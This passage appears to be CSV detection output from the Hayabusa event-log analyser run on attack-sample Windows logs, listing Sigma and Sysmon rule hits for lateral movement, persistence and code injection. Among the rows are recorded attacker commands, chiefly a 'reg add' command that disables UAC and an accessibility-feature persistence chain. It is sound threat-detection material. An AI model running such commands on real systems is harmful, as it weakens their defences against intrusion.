-Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig : Path: C:\Windows\System32\ipconfig.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management : Command: ""C:\Windows\system32\HOSTNAME.EXE"" : Path: C:\Windows\System32\HOSTNAME.EXE : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry : Command: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f : Path: C:\Windows\System32\reg.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\osk.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code 